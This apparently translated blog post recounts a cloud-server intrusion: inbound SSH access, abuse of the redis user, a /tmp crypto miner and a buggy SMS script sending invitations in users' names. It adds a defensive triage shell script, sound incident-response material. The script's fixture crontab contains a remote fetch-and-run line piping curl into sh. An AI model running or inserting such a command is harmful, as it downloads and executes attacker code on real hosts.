On the 30th the TATAUFO technology team had its team-building day. It was a good day; we did not expect it to be the beginning of a tragedy.
That night a colleague told me there was user feedback: friend-invitation messages were being sent in users' names.
Had the buggy interface from the last release been executed? I logged in to the cloud host and found an unexpected file in the root directory: its name was Jave and its group was redis. Damn it!
I checked all connections and ports and found SSH connections from 188.8.131.52: a hacker attack! I checked every process running with the redis user's privileges, every crontab, and every file updated on the 30th, and found many unknown files.
At the same time, all files on the disk mounted under /mnt had been modified, including the interface script that sends friend-request SMS messages to users' address-book contacts. The last upgrade (3.1.5) had a bug: run without input parameters, the script sends friend-request texts to every contact. Damn, OMG! Did that guy run these scripts?!
More ghosts under /tmp: MONI.1! Unbelievably, it was the infamous Litecoin mining program!
I immediately killed it, deleted the redis user, deleted all unknown files, restored the affected users' data, ... The system should be OK now.
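The triage steps described above (inbound SSH sessions from outside, processes owned by the redis user, crontab entries, files changed since a point in time) as an added example script; it is not from the original post and is not the team's own tooling. To run offline it works over constructed snapshots of `ss -tn`, `ps -eo user,pid,args` and a crontab; on a live host you would pipe the real command output into the same functions. The address 188.8.131.52 and the names Jave and MONI.1 come from the post, the internal 10.0.0.0/8 range and every other value are constructed assumptions.

```shell
#!/bin/sh
# Added example, not code from the original post. Snapshots below are
# constructed; only 188.8.131.52, Jave and MONI.1 are taken from the post.

# Constructed snapshot of `ss -tn` (local port 22 = inbound SSH session).
SS_SNAPSHOT='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
ESTAB  0      0      10.0.0.5:22         188.8.131.52:51234
ESTAB  0      0      10.0.0.5:6379       10.0.0.7:40011
ESTAB  0      0      10.0.0.5:22         10.0.0.9:50022'

# Constructed snapshot of `ps -eo user,pid,args`.
PS_SNAPSHOT='USER     PID ARGS
root       1 /sbin/init
redis    812 /usr/bin/redis-server *:6379
redis   1337 /tmp/MONI.1
www     2001 /usr/bin/php-fpm'

# Constructed crontab for one user (live host: `crontab -l -u USER`).
CRON_SNAPSHOT='*/5 * * * * curl -fsSL http://198.51.100.10/x.sh | sh
0 3 * * * /usr/local/bin/backup.sh'

# Peer addresses of established inbound SSH sessions that do not come from
# the assumed internal range 10.0.0.0/8 (adjust the pattern to your network).
foreign_ssh_peers() {
    printf '%s\n' "$SS_SNAPSHOT" | awk '
        $1 == "ESTAB" && $4 ~ /:22$/ {
            split($5, peer, ":")
            if (peer[1] !~ /^10\./) print peer[1]
        }'
}

# PID and executable of every process running as the given user.
procs_of_user() {
    printf '%s\n' "$PS_SNAPSHOT" | awk -v u="$1" '$1 == u { print $2, $3 }'
}

# Of those, flag executables living in /tmp or /dev/shm: world-writable
# directories that a legitimate service almost never runs from.
suspicious_procs_of_user() {
    procs_of_user "$1" | awk '$2 ~ /^\/(tmp|dev\/shm)\// { print $1, $2 }'
}

# Count crontab lines that download something and pipe it straight into a
# shell, a pattern worth reviewing in any crontab found on a compromised host.
cron_fetch_and_run_lines() {
    printf '%s\n' "$CRON_SNAPSHOT" \
        | grep -E '(curl|wget)[^|]*\|[[:space:]]*(sh|bash)' | wc -l | tr -d ' '
}

# "Files updated on the 30th": POSIX `find -newer` against a marker file.
# Demonstrated in a temporary directory so it runs anywhere; on a live host
# the marker would be a file whose timestamp predates the incident.
files_changed_since_marker() {
    d=$(mktemp -d)
    : > "$d/.marker"
    sleep 1
    : > "$d/Jave"          # constructed: file created after the marker
    find "$d" -type f -newer "$d/.marker" | wc -l | tr -d ' '
    rm -rf "$d"
}

# Stand-alone run: print the findings of each check.
echo "inbound SSH from outside:"; foreign_ssh_peers
echo "processes of redis in /tmp or /dev/shm:"; suspicious_procs_of_user redis
echo "crontab fetch-and-run lines: $(cron_fetch_and_run_lines)"
echo "files newer than marker: $(files_changed_since_marker)"
```

Each function prints only what the next step of the triage needs (peer address, PID plus path, a count), so the same functions can be chained with `kill`, `crontab -r` or `find ... -delete` once the findings have been reviewed.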
Security, security: cloud server security needs more attention! Reflections:
- If the cloud provider tells you there is a security risk, don't gamble on luck, thinking you're an old hand and God will bless you!
- Do not back up flawed code; always clean up the code.
- Pay attention to cloud monitoring; responses must be timely.
- Deploy a bastion host as soon as possible; don't be afraid of the hassle.
Cloud security! A passive battle with a hacker, triggered by old code.